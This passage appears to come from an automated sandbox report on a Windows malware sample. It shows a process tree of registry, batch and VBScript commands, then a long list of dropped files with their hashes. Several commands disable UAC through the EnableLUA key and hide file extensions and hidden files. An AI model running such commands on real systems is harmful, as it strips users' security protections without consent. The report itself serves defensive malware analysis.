                                                                                                                                                                                                            PID:3492
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                                            PID:452
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                                            PID:3256
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • UAC bypass
                                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                                            PID:2000
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AAIcoAEc.bat" "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe""
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:6060
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Modifies visibility of file extensions in Explorer
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                          PID:5160
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                          PID:5460
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • UAC bypass
                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                          PID:540
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pWocEEoA.bat" "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe""
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:2252
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Modifies visibility of file extensions in Explorer
                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                        PID:3100
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                        PID:2924
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • UAC bypass
                                                                                                                                                                                                        • Modifies registry key
                                                                                                                                                                                                        PID:5824
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EaEUswYg.bat" "C:\Users\Admin\Downloads\1898f2cae1e3824cb0f7fd5368171a33aba179e63501e480b4da9ea05ebf0423.exe""
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2812
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                            cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:4948
                                                                                                                                                                                                      • C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe
                                                                                                                                                                                                        "C:\Users\Admin\Downloads\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:4368

                                                                                                                                                                                                      Network

                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                      • C:\ProgramData\SystemData\tempi1.txt

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        198B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        9fba3d05ec1b93fd77ca57c02a164f68

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        17574bd470e088970f1ef66672041481cd3cad06

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        c1c08d9c70015912540d8fa49f15fd5ac10d6b9f5170008f7d8a74bba40e27ee

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        120b769b76bff1b6952ef5d5739e438c985d12f9f1d5df75bdf3b71b54c2b8a7ee203a966ffb5476e7f02240a5b359d5069fff218c84bfbdab6847964a0e7e21

                                                                                                                                                                                                      • C:\ProgramData\SystemData\tempo1.txt

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        198B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        abe773df3b75234b5448bed73361a48e

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        5a54ab9c6f360183409893c16758212e24a345e2

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        b234ccd40b2c00247a56a60ada8a79d8d3b3eb2870fc692343825703b606916e

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        37e77c24aea9f89f0c5bb2dfb712d69d8b23987e0892c5f7cc4ea740b1bd04e7d3741fac0d0c75d6339cbf9b6cb8ad638d2a43e87bec2c1d4fcda4c137f2f9af

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\etcmin.exe.log

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        539B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        b245679121623b152bea5562c173ba11

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        def65711d78669d7f8e69313be4acf2e

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        152B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        6738f4e2490ee5070d850bf03bf3efa5

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        fbc49d2dd145369e8861532e6ebf0bd56a0fe67c

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        2939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        152B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        93be3a1bf9c257eaf83babf49b0b5e01

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        8786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        cb48de1885f92bf1d8c35e300ddddee0

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        598c0a9167f447773f05106b9f3a98f98ea3fa85

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        37f2ca561bfafc1a25d77d2b7bc3cb924f83095339e2be62315ed8b062918aee

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        89feb3e23a7442b55a9d7b442498e33948266377917f3bb0af6af097961474780b78adf77b4cdffc8e6faa9212daacb0ae4d69e8ac59f88259f8cf61fe509fc8

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        580B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        23d0f3e132a021688040356991b1c978

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        5373ecd8851a6a149de983c543e1ae6c9b150b0d

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        b25aa78ea2d1f16a49f6a788a43ca2c79953d4ad0f0f5414fcfeaba62ce03e53

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        9bc5484415ac42f051daf38f5c8e57df54d3b72a90f99233d76c5d0f0ad6325bd04c0c5e6ccf4b2c6141ddd1123cc137bea8fc2597951708e96461929dc9758e

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        663B

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        a3eabe3bdd2a80fe26581d5d0a7bdf9f

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        8db1c3692014536d50ed1f0a556c1373eae626f2

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        e9cf563fae3b2915af3f25ac054cc577a16f05ea89dab67ea112183d2b0bd4bd

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        35ecc0a18a168cd251f48507cd057ffad28b17e08496220f10e8db39ba5fdc51071141e03c32c9ab901cca9535c37d6063d5474cacdbaeafb8e079de95bac045

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        5KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        40c92476fbb54c4c894f429dd2a26cce

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        17c4cf7385fcf3797ae2c90e82c5b87a87e38fc5

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        aa8ca05fd14bd0fe2538943ee7419e054d8937f74269a24582590697452af198

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        59519933dba53fe6b086171d51f47dbe2bf87b62b5e95f9cf0e672aaaa95cfe17f4a475c218df7f35b51ea2e6cfd5215bfc4819194063970102995cdeac17e2e

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        1351b70d76bac76145b555ec39d887e7

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        b90f86ad9686689118894cea162ecd72863df1b7

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        c7c9d66292ac82ba78113f9209a1c3013ad04d86fc90a3482fc152d7be453371

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        4c6a4b1f28fdb2ed426199fa8ed1560d0bed5d02603a15dd3737dc89f287fef2d9224eff301706e3d8c3e83e25451c4310c6bd174e05a6c91ca32bd4e39c074a

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        e720b0e75e3b69394effc79a20188db6

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        f30a35913708f82f0afe63cde6be8541ee4d4325

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        874c06db907c52a04cbae6082432a1adb2f99b78e6cb105f8d1065d5c40f5f0d

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        1f8f0dee459d5e4ff25bd23955821ac41a215cd51cefd19d88f040535fe9cbcfc5c7c3e2e56b44e29ad2729da5c902f146bae8745a4ada40f734a191676cda85

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        2f4bf8efbf27b752e2680ff67befef95

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        ae27b6c958fb36b3cdbacd732c8e6a71595acac6

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        0de986d42f8836d463d87cc3e78281bb2e7ce5c83f8d805424c5545f9a92e620

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        df5c86e1106443800d7d40befd4812544ed127f1bdecfad25e3613ea28eb55068a512afda8d9a565c3643cf9e8a52adebae91cc65113f89b3d9ddd8a37043c1f

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        6872900ed344e59b09129e05ec3fe09b

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        081c977ce564215b768771b245a5dfca9ffc27eb

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        ac782adc9607b52fb9b071ecc2e782d9ee86556dbb836971368455f576b0db1d

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        beee682e3328b600f18c0139d66a6743009d61d1e0c2847113dccfdadeeefc4517f772c0b0d8b648f49045d1f8e299816f696ee1de098b9a46381e65d729fd2d

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        1d264ed995d40e4c015d9116b330458b

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        7700f98f3cb2a8a7136fbbdc4001830a89672f40

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        d5cdd6ad1350528520dab14e2ce6973742372b83178ebd06f7e4bac5f515167a

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        7494cdeb2bbc81cfa58aab24a46260da6ec5f3af7ff072903107596eb3fac3cef1f28beed40e6854941a2e3f6018ca1283c5147a6a8dbb0ebac48dba61d1bb7a

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        e7b566e50537124dc04d1feb1bf7ee31

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        ec5e347f78894e809cd47de61e1e6ef64ab93265

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        f2f04baab2793a6f00e2cacdd1e124b1a6df2c62f393873425504fa0a0b1a06c

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        1dd7f161344627d892cbba7c58428736aa8f4d76ffe2acb4f62894b11257da472a31303590e410acc0dee45ee0a1b8fb67209582f82103d94e1a8575cac6199f

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        dbd3e7521e3597d8d1de25d6c94f7c1a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        38be6842230e865cf118790e819de17aeb375b60

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        c25abb05460568a026166a9bbe3d49c1b3a7dc6c4ec0db49d455dec0202872a1

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        6d3c8017b86a71d0d19417daeae14fdbd3960d0f1c5d99165e9b3c1cb2cb756fb834768bb821857c809855bf3e996c5e93d7efd09a3de69237bf0763446a1ff2

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        00828639ad2ccb1fd1521d5cc59ddc1f

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        0fd15a19f978bc6bc1cd271d2997549b715f744b

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        31c4da0018f2c4f2854d94a5519b0fd6ee2c5ed998acd036798bfa5b3bfcecc5

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        a83d8a8b493061660b4116591fc1c5ce8336f0b7fa1ddbd0ef68dc4b2049d2eec71553c19495b9dc3229644afb970958d48357611131d975aba2e2659112deda

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        6d0613c0b6f0261d049ca990fa010d73

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        697e6294c354c92b20389aac324a97223eed9d22

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        a60c5ebe14a5a0b6322e49429150c3dc52155176a61eb084ca24632e58caa65e

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        c011ea5993c4b5e40e182838c660228c20b1bebe801427121dd0c254df0a3a7949291230d30b871a9c832446b71432ece761ed9d0e268a7fa5453e41e9f8f2d6

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        e0686ab7ebbb05442dd4bf3fd7bf1791

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        943c869c66990d7c7abf193d1081b13aab37e1a8

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        ccbe63cb746f507f30e7d072b610df412d15edaf99adf688a016e3db905b4ee5

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        efa33fcfecd5bee0e9f22dc3f844fdb47a31b9be098c8e5d028a4086a906045a4a059ffc84f6985d824b2c3e545697cb5e8c0175160e7c8cf8c13b6312ca6389

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        6KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        4cd5b00c0617dd0938b3e62cb287613e

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        2d97639cf96d4a60c1e89915f481b4d9422dea8c

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        ecdbd29693e04349dba41791706dde2f1db7bcd88dc5643d21d7e176e4078f27

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        8e9d90cb850554a9c2bfb90395f394b526175b50b86942045c824124f6fd82527f280c39494c9a3354ba76b2b45df54ce7e069f7a9bf54be5637f50b68554c24

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        d6fe13658ebdb658253643dad9b2b0fd

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        303d230d1da5be2ebb27abc5ef92e5fb53c268b1

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        8e5ef9043b237367e47338dda7224d3272c5e26c9b257a9407703296e3592446

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        4c4941e5c666533dd5d906aa0d22b98e55d777bdcec131bace5bcd0b6421fbf3be35be9aa456fee830f9ef1c97acf8da01b14fe1bf2c6325896b589ad75f1218

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        18a0830063d83fa2217e98a7a06885c6

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        7cbd3f1e490026dd38867393cc794b024aee65fa

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        675138c686397e7e300a0635300053207fb54b75963db5cc54ac4d5520247388

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        9c915bf85aab4c368abcdca1c33bfe7aefea1871a12f08609d0fb8d8b3121fe937685b467b7efa2d534044adee5cb7bff5646631955ef719c0ba89f8f38219d9

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        d1e488a0e3a65924d973cf1722863947

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        2bd145237525253c3e4d60ed821a4e49b469c92b

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        488c09370232df3ed31f9290502280f84abd6c0eee926767ed6557a4eebb9c91

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        d7238c210e8d01cfa199ac02c00688c175be929fe1d0f7307fee58bc4507852892b8281a94c367be8bf1849fd95037b93c1870c58719fc40dabd4e19c53f3fdc

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        0177382e1e357a26896878ae5c25ba14

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        75a61130d045ce57f9b49027189c4d65c3dcbf07

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        6c4698849fa4c41861ddf70427769da3c6e1b1d0e35507fbe7ea1d1f7d765ba4

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        f480fb2fe9eafa9b098375eb7c8a566106c75ac5a8f4207c8cd2ab8b9dbb4aca6367e6fba9227ac703e9ca1cd68e01c6ac353661726a2f202a8c73e2c7f9e7d1

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        2eaf3b339dfcd2e6d00521c5d89d51d5

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        38569714821e4a78c574c8caa8f2508596dddb9c

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        22012009a274d3a0bd005ea4eb90fb65844bbb9c141bf48ea7ed812c78ee26c9

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        de5b760ea8d678f20b9a7711a7b3dafc78f1dbc938bbf5b738b5034080eb1e47c9585741e8680e1bae040031c68113afc6bfb685b82934cda39966a4a8e15004

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        e42843662eda1f5e0904779521138e44

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        d349759c9cef7ea1b4775ea50102b915a0f48e98

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        b8f926088dc10a6772bf460f85bd26bde0ce872d584af1bde1ad1deaab0da31b

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        a455277d92a6cc237e8f8408b30e00f89ccd4d8f58ee0ffe46a3815b30202cf249f886b5dce6e435130d1e62618164e1bec57677081adbf7c8f760e7357618d1

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        b546dcda149150c1365800774a361571

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        d522d37c87fcce40cefdb833382035a4d15b57bc

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        30b69622eda629c33cd613e3b80280cc3590740d10ba9d1b9d534007bb3a9342

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        4c600926198a38b1b524ea5d9e8f071dd18e5c817389874cff1223cd652fbd3536dc9f7febf6597800f19d9ddd60b6f1c9de0a7e8c559c0809c7c549b927d2cf

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        7508e42797abd170fee3f18b4c83e7b8

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        f58e265a7e8b042503df7d7c92dedce1cfc9f2d6

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        11118a9ce46e54837bb75a37e46550fa050bf832019d8249b42d21dc201f74bb

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        6c6471e7e221b2f23e289092e761c9995a1e1c49e493571d2ea3bdcd3ccf75353bdbf5ec7a31fd70008e694ffaee0f69f8cd529c2c922c97d8ef0e3a9371271b

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        1ca1692a3a02c20a3ebcf388538db39a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        9cc83cee59208fd18bcd1d6f3e5554c37f7894ef

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        967098af7c1c9435d2f3cdc58d1e60604d53c22730b2512d6ffe6a583c794823

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        ea0ba65670cb69dcd67e44c02d9a26d96667cfd65eebec790451abbcc6033415528c43811993aa613eee3920d78559ddffd3f65fd517d5131d9dc1b14ca0debd

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                        1KB

                                                                                                                                                                                                        MD5

                                                                                                                                                                                                        ebc144f677f00fccc7c58d8e4b078a9a

                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                        3a0fd88d78f8e0088a79ef3939745836204b89f8

                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                        7cb7f2a5d6bdd0f0ff41266c2d9e32a2e628e90a6658d74c3c7c4bc54733d8f8

                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                        f43ce904a2f1caaba4edcf6b3ba014d733897a102e8409ffa41c2b689c5a0d0d6c470a4df5467b589fa6e7585851a28f1a18a000c35b96495ed7b7ef02e4d55b

                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                                                        Filesize

